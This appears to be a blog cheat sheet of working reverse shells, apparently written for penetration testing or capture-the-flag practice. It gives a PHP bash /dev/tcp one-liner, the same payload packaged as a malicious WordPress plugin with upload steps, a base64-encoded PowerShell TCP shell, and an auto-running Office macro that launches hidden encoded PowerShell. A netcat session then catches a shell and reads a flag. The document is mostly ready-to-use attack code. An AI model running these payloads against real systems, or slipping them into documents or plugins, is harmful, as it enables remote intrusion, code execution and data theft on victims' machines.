Reverse shells
(a work in progress list of some handy reverse shells)
ℹ️ Some nifty links
- generator
- cheatsheet
- another repo list
Opening
PHP
A generic PHP reverse shell where you can/should swap out the listening IP address and port:
1
2
3
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.224/8080 0>&1'");
?>
WordPress
For a WordPress plugin, you need to add a bit more info for it to load as a “valid” plugin as outlined in the plugin development docs .
1
2
3
4
5
6
7
8
9
10
11
<?php
/**
* Plugin Name: reverse shell plugin
* Description: opens a reverse shell with bash
* Version: 0.1
* Author: some-natalie
* Author URI: https://some-natalie.dev
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.224/8080 0>&1'");
?>
Zip that PHP file, then upload the zipped file as a plugin.
This lovely malicious WordPress plugin generator works well on some versions of WordPress and not others. The boring one above works a bit more uniformally, but is nowhere near as full of features.
Powershell
Edit the IP address and port, then encode it to base64 for easy copy/paste:
1
2
3
4
5
6
7
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.236",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText
Office Macro
Here’s a basic macro that invokes powercat to create a reverse shell. Getting everything right for that payload is tedious, so I made a quick script (payload.py ) to create the base64-encoded payload for a simple reverse shell. Then paste that content into the macro below. Make sure to save the macro attached to the document (not the workspace). Use .docm or .doc for Word, etc. for other formats.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
' edit the payload.py inputs to produce the right output here
Str = Str + "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAd"
Str = Str + "uAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhA"
Str = Str + "CAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGw"
Str = Str + "A"
CreateObject("Wscript.Shell").Run Str
End Sub
Catching
netcat
1
2
3
4
5
6
ᐅ nc -l 8080
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@8b8f280a8848:/var/www/html/wp-admin$ cat /tmp/flag
cat /tmp/flag
flag{a sneaky flag has appeared}